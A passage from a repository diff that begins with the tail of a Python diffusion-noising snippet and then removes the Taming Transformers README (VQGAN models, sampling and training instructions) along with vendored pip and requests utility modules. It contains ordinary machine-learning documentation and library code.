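def q_sample(x_start: torch.Tensor, t: torch.Tensor, noise: torch.Tensor) -> torch.Tensor:
    """x_t = sqrt(alpha_bar_t) * x_0 + sqrt(1 - alpha_bar_t) * eps, broadcast over (C, H, W)."""
    abar = alphas_cumprod[t].view(-1, *([1] * (x_start.dim() - 1)))
    return abar.sqrt() * x_start + (1.0 - abar).sqrt() * noise

# Usage: noise a batch of 4 tensors at independently sampled timesteps.
x0 = torch.randn(4, 3, 64, 64)
t = torch.randint(0, T, (4,))
eps = torch.randn_like(x0)
x_t = q_sample(x0, t, eps)
# With the "eps" parameterization used above, the network is trained to recover
# `eps` from (x_t, t); p_losses compares the model output to this noise target.
```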
diff --git a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/README.md b/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/README.md
deleted file mode 100644
index d295fbf75703e6cd285330432785b8cdea072ba7..0000000000000000000000000000000000000000
--- a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/README.md
+++ /dev/null
@@ -1,410 +0,0 @@
-# Taming Transformers for High-Resolution Image Synthesis
-##### CVPR 2021 (Oral)
-
-
-[**Taming Transformers for High-Resolution Image Synthesis**](https://compvis.github.io/taming-transformers/)
-[Patrick Esser](https://github.com/pesser)\*,
-[Robin Rombach](https://github.com/rromb)\*,
-[Björn Ommer](https://hci.iwr.uni-heidelberg.de/Staff/bommer)
-\* equal contribution
-
-**tl;dr** We combine the efficiency of convolutional approaches with the expressivity of transformers by introducing a convolutional VQGAN, which learns a codebook of context-rich visual parts, whose composition is modeled with an autoregressive transformer.
-
-
-[arXiv](https://arxiv.org/abs/2012.09841) | [BibTeX](#bibtex) | [Project Page](https://compvis.github.io/taming-transformers/)
-
-
-### News
-#### 2022
-- More pretrained VQGANs (e.g. an f8-model with only 256 codebook entries) are available in our new work on [Latent Diffusion Models](https://github.com/CompVis/latent-diffusion).
-- Added scene synthesis models as proposed in the paper [High-Resolution Complex Scene Synthesis with Transformers](https://arxiv.org/abs/2105.06458), see [this section](#scene-image-synthesis).
-#### 2021
-- Thanks to [rom1504](https://github.com/rom1504) it is now easy to [train a VQGAN on your own datasets](#training-on-custom-data).
-- Included a bugfix for the quantizer. For backward compatibility it is
- disabled by default (which corresponds to always training with `beta=1.0`).
- Use `legacy=False` in the quantizer config to enable it.
- Thanks [richcmwang](https://github.com/richcmwang) and [wcshin-git](https://github.com/wcshin-git)!
-- Our paper received an update: See https://arxiv.org/abs/2012.09841v3 and the corresponding changelog.
-- Added a pretrained, [1.4B transformer model](https://k00.fr/s511rwcv) trained for class-conditional ImageNet synthesis, which obtains state-of-the-art FID scores among autoregressive approaches and outperforms BigGAN.
-- Added pretrained, unconditional models on [FFHQ](https://k00.fr/yndvfu95) and [CelebA-HQ](https://k00.fr/2xkmielf).
-- Added accelerated sampling via caching of keys/values in the self-attention operation, used in `scripts/sample_fast.py`.
-- Added a checkpoint of a [VQGAN](https://heibox.uni-heidelberg.de/d/2e5662443a6b4307b470/) trained with f8 compression and Gumbel-Quantization.
- See also our updated [reconstruction notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb).
-- We added a [colab notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb) which compares two VQGANs and OpenAI's [DALL-E](https://github.com/openai/DALL-E). See also [this section](#more-resources).
-- We now include an overview of pretrained models in [Tab.1](#overview-of-pretrained-models). We added models for [COCO](#coco) and [ADE20k](#ade20k).
-- The streamlit demo now supports image completions.
-- We now include a couple of examples from the D-RIN dataset so you can run the
- [D-RIN demo](#d-rin) without preparing the dataset first.
-- You can now jump right into sampling with our [Colab quickstart notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/taming-transformers.ipynb).
-
-## Requirements
-A suitable [conda](https://conda.io/) environment named `taming` can be created
-and activated with:
-
-```
-conda env create -f environment.yaml
-conda activate taming
-```
-## Overview of pretrained models
-The following table provides an overview of all models that are currently available.
-FID scores were evaluated using [torch-fidelity](https://github.com/toshas/torch-fidelity).
-For reference, we also include a link to the recently released autoencoder of the [DALL-E](https://github.com/openai/DALL-E) model.
-See the corresponding [colab
-notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb)
-for a comparison and discussion of reconstruction capabilities.
-
-| Dataset | FID vs train | FID vs val | Link | Samples (256x256) | Comments
-| ------------- | ------------- | ------------- |------------- | ------------- |------------- |
-| FFHQ (f=16) | 9.6 | -- | [ffhq_transformer](https://k00.fr/yndvfu95) | [ffhq_samples](https://k00.fr/j626x093) |
-| CelebA-HQ (f=16) | 10.2 | -- | [celebahq_transformer](https://k00.fr/2xkmielf) | [celebahq_samples](https://k00.fr/j626x093) |
-| ADE20K (f=16) | -- | 35.5 | [ade20k_transformer](https://k00.fr/ot46cksa) | [ade20k_samples.zip](https://heibox.uni-heidelberg.de/f/70bb78cbaf844501b8fb/) [2k] | evaluated on val split (2k images)
-| COCO-Stuff (f=16) | -- | 20.4 | [coco_transformer](https://k00.fr/2zz6i2ce) | [coco_samples.zip](https://heibox.uni-heidelberg.de/f/a395a9be612f4a7a8054/) [5k] | evaluated on val split (5k images)
-| ImageNet (cIN) (f=16) | 15.98/15.78/6.59/5.88/5.20 | -- | [cin_transformer](https://k00.fr/s511rwcv) | [cin_samples](https://k00.fr/j626x093) | different decoding hyperparameters |
-| | | | || |
-| FacesHQ (f=16) | -- | -- | [faceshq_transformer](https://k00.fr/qqfl2do8)
-| S-FLCKR (f=16) | -- | -- | [sflckr](https://heibox.uni-heidelberg.de/d/73487ab6e5314cb5adba/)
-| D-RIN (f=16) | -- | -- | [drin_transformer](https://k00.fr/39jcugc5)
-| | | | | || |
-| VQGAN ImageNet (f=16), 1024 | 10.54 | 7.94 | [vqgan_imagenet_f16_1024](https://heibox.uni-heidelberg.de/d/8088892a516d4e3baf92/) | [reconstructions](https://k00.fr/j626x093) | Reconstruction-FIDs.
-| VQGAN ImageNet (f=16), 16384 | 7.41 | 4.98 |[vqgan_imagenet_f16_16384](https://heibox.uni-heidelberg.de/d/a7530b09fed84f80a887/) | [reconstructions](https://k00.fr/j626x093) | Reconstruction-FIDs.
-| VQGAN OpenImages (f=8), 256 | -- | 1.49 |https://ommer-lab.com/files/latent-diffusion/vq-f8-n256.zip | --- | Reconstruction-FIDs. Available via [latent diffusion](https://github.com/CompVis/latent-diffusion).
-| VQGAN OpenImages (f=8), 16384 | -- | 1.14 |https://ommer-lab.com/files/latent-diffusion/vq-f8.zip | --- | Reconstruction-FIDs. Available via [latent diffusion](https://github.com/CompVis/latent-diffusion)
-| VQGAN OpenImages (f=8), 8192, GumbelQuantization | 3.24 | 1.49 |[vqgan_gumbel_f8](https://heibox.uni-heidelberg.de/d/2e5662443a6b4307b470/) | --- | Reconstruction-FIDs.
-| | | | | || |
-| DALL-E dVAE (f=8), 8192, GumbelQuantization | 33.88 | 32.01 | https://github.com/openai/DALL-E | [reconstructions](https://k00.fr/j626x093) | Reconstruction-FIDs.
-
-
-## Running pretrained models
-
-The commands below will start a streamlit demo which supports sampling at
-different resolutions and image completions. To run a non-interactive version
-of the sampling process, replace `streamlit run scripts/sample_conditional.py --`
-by `python scripts/make_samples.py --outdir ` and
-keep the remaining command line arguments.
-
-To sample from unconditional or class-conditional models,
-run `python scripts/sample_fast.py -r `.
-We describe below how to use this script to sample from the ImageNet, FFHQ, and CelebA-HQ models,
-respectively.
-
-### S-FLCKR
-
-
-You can also [run this model in a Colab
-notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/taming-transformers.ipynb),
-which includes all necessary steps to start sampling.
-
-Download the
-[2020-11-09T13-31-51_sflckr](https://heibox.uni-heidelberg.de/d/73487ab6e5314cb5adba/)
-folder and place it into `logs`. Then, run
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-09T13-31-51_sflckr/
-```
-
-### ImageNet
-
-
-Download the [2021-04-03T19-39-50_cin_transformer](https://k00.fr/s511rwcv)
-folder and place it into logs. Sampling from the class-conditional ImageNet
-model does not require any data preparation. To produce 50 samples for each of
-the 1000 classes of ImageNet, with k=600 for top-k sampling, p=0.92 for nucleus
-sampling and temperature t=1.0, run
-
-```
-python scripts/sample_fast.py -r logs/2021-04-03T19-39-50_cin_transformer/ -n 50 -k 600 -t 1.0 -p 0.92 --batch_size 25
-```
-
-To restrict the model to certain classes, provide them via the `--classes` argument, separated by
-commas. For example, to sample 50 *ostriches*, *border collies* and *whiskey jugs*, run
-
-```
-python scripts/sample_fast.py -r logs/2021-04-03T19-39-50_cin_transformer/ -n 50 -k 600 -t 1.0 -p 0.92 --batch_size 25 --classes 9,232,901
-```
-We recommend experimenting with the autoregressive decoding parameters (top-k, top-p and temperature) for best results.
-
-### FFHQ/CelebA-HQ
-
-Download the [2021-04-23T18-19-01_ffhq_transformer](https://k00.fr/yndvfu95) and
-[2021-04-23T18-11-19_celebahq_transformer](https://k00.fr/2xkmielf)
-folders and place them into logs.
-Again, sampling from these unconditional models does not require any data preparation.
-To produce 50000 samples, with k=250 for top-k sampling,
-p=1.0 for nucleus sampling and temperature t=1.0, run
-
-```
-python scripts/sample_fast.py -r logs/2021-04-23T18-19-01_ffhq_transformer/
-```
-for FFHQ and
-
-```
-python scripts/sample_fast.py -r logs/2021-04-23T18-11-19_celebahq_transformer/
-```
-to sample from the CelebA-HQ model.
-For both models it can be advantageous to vary the top-k/top-p parameters for sampling.
-
-### FacesHQ
-
-
-Download [2020-11-13T21-41-45_faceshq_transformer](https://k00.fr/qqfl2do8) and
-place it into `logs`. Follow the data preparation steps for
-[CelebA-HQ](#celeba-hq) and [FFHQ](#ffhq). Run
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-13T21-41-45_faceshq_transformer/
-```
-
-### D-RIN
-
-
-Download [2020-11-20T12-54-32_drin_transformer](https://k00.fr/39jcugc5) and
-place it into `logs`. To run the demo on a couple of example depth maps
-included in the repository, run
-
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-20T12-54-32_drin_transformer/ --ignore_base_data data="{target: main.DataModuleFromConfig, params: {batch_size: 1, validation: {target: taming.data.imagenet.DRINExamples}}}"
-```
-
-To run the demo on the complete validation set, first follow the data preparation steps for
-[ImageNet](#imagenet) and then run
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-20T12-54-32_drin_transformer/
-```
-
-### COCO
-Download [2021-01-20T16-04-20_coco_transformer](https://k00.fr/2zz6i2ce) and
-place it into `logs`. To run the demo on a couple of example segmentation maps
-included in the repository, run
-
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2021-01-20T16-04-20_coco_transformer/ --ignore_base_data data="{target: main.DataModuleFromConfig, params: {batch_size: 1, validation: {target: taming.data.coco.Examples}}}"
-```
-
-### ADE20k
-Download [2020-11-20T21-45-44_ade20k_transformer](https://k00.fr/ot46cksa) and
-place it into `logs`. To run the demo on a couple of example segmentation maps
-included in the repository, run
-
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-20T21-45-44_ade20k_transformer/ --ignore_base_data data="{target: main.DataModuleFromConfig, params: {batch_size: 1, validation: {target: taming.data.ade20k.Examples}}}"
-```
-
-## Scene Image Synthesis
-
-Scene image generation based on bounding box conditionals as done in our CVPR2021 AI4CC workshop paper [High-Resolution Complex Scene Synthesis with Transformers](https://arxiv.org/abs/2105.06458) (see talk on [workshop page](https://visual.cs.brown.edu/workshops/aicc2021/#awards)). The supported datasets are COCO and Open Images.
-
-### Training
-Download first-stage models [COCO-8k-VQGAN](https://heibox.uni-heidelberg.de/f/78dea9589974474c97c1/) for COCO or [COCO/Open-Images-8k-VQGAN](https://heibox.uni-heidelberg.de/f/461d9a9f4fcf48ab84f4/) for Open Images.
-Change `ckpt_path` in `data/coco_scene_images_transformer.yaml` and `data/open_images_scene_images_transformer.yaml` to point to the downloaded first-stage models.
-Download the full COCO/OI datasets and adapt `data_path` in the same files, unless the 100 files provided for training and validation already suit your needs.
-
-Code can be run with
-`python main.py --base configs/coco_scene_images_transformer.yaml -t True --gpus 0,`
-or
-`python main.py --base configs/open_images_scene_images_transformer.yaml -t True --gpus 0,`
-
-### Sampling
-Train a model as described above or download a pre-trained model:
- - [Open Images 1 billion parameter model](https://drive.google.com/file/d/1FEK-Z7hyWJBvFWQF50pzSK9y1W_CJEig/view?usp=sharing), trained for 100 epochs. On 256x256 pixels, FID 41.48±0.21, SceneFID 14.60±0.15, Inception Score 18.47±0.27. The model was trained with 2d crops of images and is thus well-prepared for the task of generating high-resolution images, e.g. 512x512.
- - [Open Images distilled version of the above model with 125 million parameters](https://drive.google.com/file/d/1xf89g0mc78J3d8Bx5YhbK4tNRNlOoYaO), which allows for sampling on smaller GPUs (4 GB is enough for sampling 256x256 px images). The model was trained for 60 epochs with 10% soft loss, 90% hard loss. On 256x256 pixels, FID 43.07±0.40, SceneFID 15.93±0.19, Inception Score 17.23±0.11.
- - [COCO 30 epochs](https://heibox.uni-heidelberg.de/f/0d0b2594e9074c7e9a33/)
- - [COCO 60 epochs](https://drive.google.com/file/d/1bInd49g2YulTJBjU32Awyt5qnzxxG5U9/) (find model statistics for both COCO versions in `assets/coco_scene_images_training.svg`)
-
-When downloading a pre-trained model, remember to change `ckpt_path` in `configs/*project.yaml` to point to your downloaded first-stage model (see ->Training).
-
-Scene image generation can be run with
-`python scripts/make_scene_samples.py --outdir=/some/outdir -r /path/to/pretrained/model --resolution=512,512`
-
-
-## Training on custom data
-
-Training on your own dataset can be beneficial to get better tokens and hence better images for your domain.
-These are the steps to follow to make this work:
-1. install the repo with `conda env create -f environment.yaml`, `conda activate taming` and `pip install -e .`
-2. put your .jpg files in a folder `your_folder`
-3. create two text files, `xx_train.txt` and `xx_test.txt`, that point to the files in your training and test set respectively (for example `find $(pwd)/your_folder -name "*.jpg" > train.txt`); a Python alternative is sketched after this list
-4. adapt `configs/custom_vqgan.yaml` to point to these 2 files
-5. run `python main.py --base configs/custom_vqgan.yaml -t True --gpus 0,1` to
-   train on two GPUs. Use `--gpus 0,` (with a trailing comma) to train on a single GPU.
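-
-A minimal Python sketch for step 3 that writes both list files (the folder name
-and the 90/10 split below are assumptions, adjust them to your data):
-
-```
-import random
-from pathlib import Path
-
-# Collect absolute paths to all .jpg files, then split them into train/test lists.
-files = sorted(str(p.resolve()) for p in Path("your_folder").glob("*.jpg"))
-random.seed(0)
-random.shuffle(files)
-n_test = max(1, len(files) // 10)  # hold out roughly 10% of the images for testing
-Path("xx_test.txt").write_text("\n".join(files[:n_test]) + "\n")
-Path("xx_train.txt").write_text("\n".join(files[n_test:]) + "\n")
-```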
-
-## Data Preparation
-
-### ImageNet
-The code will try to download (through [Academic
-Torrents](http://academictorrents.com/)) and prepare ImageNet the first time it
-is used. However, since ImageNet is quite large, this requires a lot of disk
-space and time. If you already have ImageNet on your disk, you can speed things
-up by putting the data into
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/data/` (which defaults to
-`~/.cache/autoencoders/data/ILSVRC2012_{split}/data/`), where `{split}` is one
-of `train`/`validation`. It should have the following structure:
-
-```
-${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/data/
-├── n01440764
-│ ├── n01440764_10026.JPEG
-│ ├── n01440764_10027.JPEG
-│ ├── ...
-├── n01443537
-│ ├── n01443537_10007.JPEG
-│ ├── n01443537_10014.JPEG
-│ ├── ...
-├── ...
-```
-
-If you haven't extracted the data, you can also place
-`ILSVRC2012_img_train.tar`/`ILSVRC2012_img_val.tar` (or symlinks to them) into
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_train/` /
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_validation/`, which will then be
-extracted into the above structure without downloading it again. Note that this
-will only happen if neither a folder
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/data/` nor a file
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/.ready` exist. Remove them
-if you want to force running the dataset preparation again.
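-
-As an illustration of the second option, a short Python sketch that symlinks an
-already-downloaded archive into the expected location (the cache variable follows
-the `${XDG_CACHE}` notation above; the source path is an assumption):
-
-```
-import os
-from pathlib import Path
-
-# Resolve the cache root: $XDG_CACHE if set, otherwise ~/.cache.
-cache = Path(os.environ.get("XDG_CACHE", str(Path.home() / ".cache")))
-target_dir = cache / "autoencoders/data/ILSVRC2012_train"
-target_dir.mkdir(parents=True, exist_ok=True)
-# Point the expected tar name at the archive you already have on disk.
-(target_dir / "ILSVRC2012_img_train.tar").symlink_to("/data/ILSVRC2012_img_train.tar")
-```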
-
-You will then need to prepare the depth data using
-[MiDaS](https://github.com/intel-isl/MiDaS). Create a symlink
-`data/imagenet_depth` pointing to a folder with two subfolders `train` and
-`val`, each mirroring the structure of the corresponding ImageNet folder
-described above and containing a `png` file for each of ImageNet's `JPEG`
-files. The `png` encodes `float32` depth values obtained from MiDaS as RGBA
-images. We provide the script `scripts/extract_depth.py` to generate this data.
-**Please note** that this script uses [MiDaS via PyTorch
-Hub](https://pytorch.org/hub/intelisl_midas_v2/). When we prepared the data,
-the hub provided the [MiDaS
-v2.0](https://github.com/intel-isl/MiDaS/releases/tag/v2) version, but now it
-provides a v2.1 version. We haven't tested our models with depth maps obtained
-via v2.1, so if you want to make sure that things work as expected, you must
-adjust the script so that it explicitly uses
-[v2.0](https://github.com/intel-isl/MiDaS/releases/tag/v2)!
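-
-The exact packing is implemented in `scripts/extract_depth.py`; purely as an
-illustration of the idea (not the repository's script), a minimal sketch that
-round-trips a `float32` depth map through a 4-channel RGBA PNG by viewing each
-float as four bytes:
-
-```
-import numpy as np
-from PIL import Image
-
-def save_depth_as_rgba(depth: np.ndarray, path: str) -> None:
-    # Reinterpret the (H, W) float32 map as (H, W, 4) uint8 and store it losslessly.
-    rgba = np.ascontiguousarray(depth, dtype=np.float32).view(np.uint8).reshape(*depth.shape, 4)
-    Image.fromarray(rgba, mode="RGBA").save(path)
-
-def load_depth_from_rgba(path: str) -> np.ndarray:
-    # Undo the packing: view the four uint8 channels as one float32 value per pixel.
-    rgba = np.array(Image.open(path), dtype=np.uint8)
-    return rgba.view(np.float32).squeeze(-1)
-```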
-
-### CelebA-HQ
-Create a symlink `data/celebahq` pointing to a folder containing the `.npy`
-files of CelebA-HQ (instructions to obtain them can be found in the [PGGAN
-repository](https://github.com/tkarras/progressive_growing_of_gans)).
-
-### FFHQ
-Create a symlink `data/ffhq` pointing to the `images1024x1024` folder obtained
-from the [FFHQ repository](https://github.com/NVlabs/ffhq-dataset).
-
-### S-FLCKR
-Unfortunately, we are not allowed to distribute the images we collected for the
-S-FLCKR dataset and can therefore only give a description of how it was produced.
-There are many resources on [collecting images from the
-web](https://github.com/adrianmrit/flickrdatasets) to get started.
-We collected sufficiently large images from [flickr](https://www.flickr.com)
-(see `data/flickr_tags.txt` for a full list of tags used to find images)
-and various [subreddits](https://www.reddit.com/r/sfwpornnetwork/wiki/network)
-(see `data/subreddits.txt` for all subreddits that were used).
-Overall, we collected 107625 images, and split them randomly into 96861
-training images and 10764 validation images. We then obtained segmentation
-masks for each image using [DeepLab v2](https://arxiv.org/abs/1606.00915)
-trained on [COCO-Stuff](https://arxiv.org/abs/1612.03716). We used a [PyTorch
-reimplementation](https://github.com/kazuto1011/deeplab-pytorch) and include an
-example script for this process in `scripts/extract_segmentation.py`.
-
-### COCO
-Create a symlink `data/coco` containing the images from the 2017 split in
-`train2017` and `val2017`, and their annotations in `annotations`. Files can be
-obtained from the [COCO webpage](https://cocodataset.org/). In addition, we use
-the [Stuff+thing PNG-style annotations on COCO 2017
-trainval](http://calvin.inf.ed.ac.uk/wp-content/uploads/data/cocostuffdataset/stuffthingmaps_trainval2017.zip)
-annotations from [COCO-Stuff](https://github.com/nightrome/cocostuff), which
-should be placed under `data/cocostuffthings`.
-
-### ADE20k
-Create a symlink `data/ade20k_root` containing the contents of
-[ADEChallengeData2016.zip](http://data.csail.mit.edu/places/ADEchallenge/ADEChallengeData2016.zip)
-from the [MIT Scene Parsing Benchmark](http://sceneparsing.csail.mit.edu/).
-
-## Training models
-
-### FacesHQ
-
-Train a VQGAN with
-```
-python main.py --base configs/faceshq_vqgan.yaml -t True --gpus 0,
-```
-
-Then, adjust the checkpoint path of the config key
-`model.params.first_stage_config.params.ckpt_path` in
-`configs/faceshq_transformer.yaml` (or download
-[2020-11-09T13-33-36_faceshq_vqgan](https://k00.fr/uxy5usa9) and place into `logs`, which
-corresponds to the preconfigured checkpoint path), then run
-```
-python main.py --base configs/faceshq_transformer.yaml -t True --gpus 0,
-```
-
-### D-RIN
-
-Train a VQGAN on ImageNet with
-```
-python main.py --base configs/imagenet_vqgan.yaml -t True --gpus 0,
-```
-
-or download a pretrained one from [2020-09-23T17-56-33_imagenet_vqgan](https://k00.fr/u0j2dtac)
-and place under `logs`. If you trained your own, adjust the path in the config
-key `model.params.first_stage_config.params.ckpt_path` of
-`configs/drin_transformer.yaml`.
-
-Train a VQGAN on Depth Maps of ImageNet with
-```
-python main.py --base configs/imagenetdepth_vqgan.yaml -t True --gpus 0,
-```
-
-or download a pretrained one from [2020-11-03T15-34-24_imagenetdepth_vqgan](https://k00.fr/55rlxs6i)
-and place under `logs`. If you trained your own, adjust the path in the config
-key `model.params.cond_stage_config.params.ckpt_path` of
-`configs/drin_transformer.yaml`.
-
-To train the transformer, run
-```
-python main.py --base configs/drin_transformer.yaml -t True --gpus 0,
-```
-
-## More Resources
-### Comparing Different First Stage Models
-The reconstruction and compression capabilities of different first stage models can be analyzed in this [colab notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb).
-In particular, the notebook compares two VQGANs, each with a downsampling factor of f=16 and codebook dimensionalities of 1024 and 16384 respectively,
-a VQGAN with f=8 and 8192 codebook entries and the discrete autoencoder of OpenAI's [DALL-E](https://github.com/openai/DALL-E) (which has f=8 and 8192
-codebook entries).
-
-
-
-### Other
-- A [video summary](https://www.youtube.com/watch?v=o7dqGcLDf0A&feature=emb_imp_woyt) by [Two Minute Papers](https://www.youtube.com/channel/UCbfYPyITQ-7l4upoX8nvctg).
-- A [video summary](https://www.youtube.com/watch?v=-wDSDtIAyWQ) by [Gradient Dude](https://www.youtube.com/c/GradientDude/about).
-- A [weights and biases report summarizing the paper](https://wandb.ai/ayush-thakur/taming-transformer/reports/-Overview-Taming-Transformers-for-High-Resolution-Image-Synthesis---Vmlldzo0NjEyMTY)
-by [ayulockin](https://github.com/ayulockin).
-- A [video summary](https://www.youtube.com/watch?v=JfUTd8fjtX8&feature=emb_imp_woyt) by [What's AI](https://www.youtube.com/channel/UCUzGQrN-lyyc0BWTYoJM_Sg).
-- Take a look at [ak9250's notebook](https://github.com/ak9250/taming-transformers/blob/master/tamingtransformerscolab.ipynb) if you want to run the streamlit demos on Colab.
-
-### Text-to-Image Optimization via CLIP
-VQGAN has been successfully used as an image generator guided by the [CLIP](https://github.com/openai/CLIP) model, both for pure image generation
-from scratch and image-to-image translation. We recommend the following notebooks/videos/resources:
-
- - [Advadnouns](https://twitter.com/advadnoun/status/1389316507134357506) Patreon and corresponding LatentVision notebooks: https://www.patreon.com/patronizeme
- - The [notebook](https://colab.research.google.com/drive/1L8oL-vLJXVcRzCFbPwOoMkPKJ8-aYdPN) of [Rivers Have Wings](https://twitter.com/RiversHaveWings).
- - A [video](https://www.youtube.com/watch?v=90QDe6DQXF4&t=12s) explanation by [Dot CSV](https://www.youtube.com/channel/UCy5znSnfMsDwaLlROnZ7Qbg) (in Spanish, but English subtitles are available)
-
-
-
-Text prompt: *'A bird drawn by a child'*
-
-## Shout-outs
-Thanks to everyone who makes their code and models available. In particular,
-
-- The architecture of our VQGAN is inspired by [Denoising Diffusion Probabilistic Models](https://github.com/hojonathanho/diffusion)
-- The very hackable transformer implementation [minGPT](https://github.com/karpathy/minGPT)
-- The good ol' [PatchGAN](https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix) and [Learned Perceptual Similarity (LPIPS)](https://github.com/richzhang/PerceptualSimilarity)
-
-## BibTeX
-
-```
-@misc{esser2020taming,
- title={Taming Transformers for High-Resolution Image Synthesis},
- author={Patrick Esser and Robin Rombach and Björn Ommer},
- year={2020},
- eprint={2012.09841},
- archivePrefix={arXiv},
- primaryClass={cs.CV}
-}
-```
diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/utils/urls.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/utils/urls.py
deleted file mode 100644
index 6ba2e04f350792e2c0021cf7ba7f40b25dc6cd51..0000000000000000000000000000000000000000
--- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/utils/urls.py
+++ /dev/null
@@ -1,62 +0,0 @@
-import os
-import string
-import urllib.parse
-import urllib.request
-from typing import Optional
-
-from .compat import WINDOWS
-
-
-def get_url_scheme(url: str) -> Optional[str]:
- if ":" not in url:
- return None
- return url.split(":", 1)[0].lower()
-
-
-def path_to_url(path: str) -> str:
- """
- Convert a path to a file: URL. The path will be made absolute and have
- quoted path parts.
- """
- path = os.path.normpath(os.path.abspath(path))
- url = urllib.parse.urljoin("file:", urllib.request.pathname2url(path))
- return url
-
-
-def url_to_path(url: str) -> str:
- """
- Convert a file: URL to a path.
- """
- assert url.startswith(
- "file:"
- ), f"You can only turn file: urls into filenames (not {url!r})"
-
- _, netloc, path, _, _ = urllib.parse.urlsplit(url)
-
- if not netloc or netloc == "localhost":
- # According to RFC 8089, same as empty authority.
- netloc = ""
- elif WINDOWS:
- # If we have a UNC path, prepend UNC share notation.
- netloc = "\\\\" + netloc
- else:
- raise ValueError(
- f"non-local file URIs are not supported on this platform: {url!r}"
- )
-
- path = urllib.request.url2pathname(netloc + path)
-
- # On Windows, urlsplit parses the path as something like "/C:/Users/foo".
- # This creates issues for path-related functions like io.open(), so we try
- # to detect and strip the leading slash.
- if (
- WINDOWS
- and not netloc # Not UNC.
- and len(path) >= 3
- and path[0] == "/" # Leading slash to strip.
- and path[1] in string.ascii_letters # Drive letter.
- and path[2:4] in (":", ":/") # Colon + end of string, or colon + absolute path.
- ):
- path = path[1:]
-
- return path
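-
-
-# Illustrative round trip on a POSIX system (not part of pip's public API):
-#
-#     path_to_url("/tmp/example.txt")         -> "file:///tmp/example.txt"
-#     url_to_path("file:///tmp/example.txt")  -> "/tmp/example.txt"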
diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/exceptions.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/exceptions.py
deleted file mode 100644
index 168d07390dfc366102b8197e4b271e493bd94d11..0000000000000000000000000000000000000000
--- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/exceptions.py
+++ /dev/null
@@ -1,141 +0,0 @@
-"""
-requests.exceptions
-~~~~~~~~~~~~~~~~~~~
-
-This module contains the set of Requests' exceptions.
-"""
-from pip._vendor.urllib3.exceptions import HTTPError as BaseHTTPError
-
-from .compat import JSONDecodeError as CompatJSONDecodeError
-
-
-class RequestException(IOError):
- """There was an ambiguous exception that occurred while handling your
- request.
- """
-
- def __init__(self, *args, **kwargs):
- """Initialize RequestException with `request` and `response` objects."""
- response = kwargs.pop("response", None)
- self.response = response
- self.request = kwargs.pop("request", None)
- if response is not None and not self.request and hasattr(response, "request"):
- self.request = self.response.request
- super().__init__(*args, **kwargs)
-
-
-class InvalidJSONError(RequestException):
- """A JSON error occurred."""
-
-
-class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError):
- """Couldn't decode the text into json"""
-
- def __init__(self, *args, **kwargs):
- """
- Construct the JSONDecodeError instance first with all
-        args. Then use its args to construct the IOError so that
- the json specific args aren't used as IOError specific args
- and the error message from JSONDecodeError is preserved.
- """
- CompatJSONDecodeError.__init__(self, *args)
- InvalidJSONError.__init__(self, *self.args, **kwargs)
-
-
-class HTTPError(RequestException):
- """An HTTP error occurred."""
-
-
-class ConnectionError(RequestException):
- """A Connection error occurred."""
-
-
-class ProxyError(ConnectionError):
- """A proxy error occurred."""
-
-
-class SSLError(ConnectionError):
- """An SSL error occurred."""
-
-
-class Timeout(RequestException):
- """The request timed out.
-
- Catching this error will catch both
- :exc:`~requests.exceptions.ConnectTimeout` and
- :exc:`~requests.exceptions.ReadTimeout` errors.
- """
-
-
-class ConnectTimeout(ConnectionError, Timeout):
- """The request timed out while trying to connect to the remote server.
-
- Requests that produced this error are safe to retry.
- """
-
-
-class ReadTimeout(Timeout):
- """The server did not send any data in the allotted amount of time."""
-
-
-class URLRequired(RequestException):
- """A valid URL is required to make a request."""
-
-
-class TooManyRedirects(RequestException):
- """Too many redirects."""
-
-
-class MissingSchema(RequestException, ValueError):
- """The URL scheme (e.g. http or https) is missing."""
-
-
-class InvalidSchema(RequestException, ValueError):
- """The URL scheme provided is either invalid or unsupported."""
-
-
-class InvalidURL(RequestException, ValueError):
- """The URL provided was somehow invalid."""
-
-
-class InvalidHeader(RequestException, ValueError):
- """The header value provided was somehow invalid."""
-
-
-class InvalidProxyURL(InvalidURL):
- """The proxy URL provided is invalid."""
-
-
-class ChunkedEncodingError(RequestException):
- """The server declared chunked encoding but sent an invalid chunk."""
-
-
-class ContentDecodingError(RequestException, BaseHTTPError):
- """Failed to decode response content."""
-
-
-class StreamConsumedError(RequestException, TypeError):
- """The content for this response was already consumed."""
-
-
-class RetryError(RequestException):
- """Custom retries logic failed"""
-
-
-class UnrewindableBodyError(RequestException):
- """Requests encountered an error when trying to rewind a body."""
-
-
-# Warnings
-
-
-class RequestsWarning(Warning):
- """Base warning for Requests."""
-
-
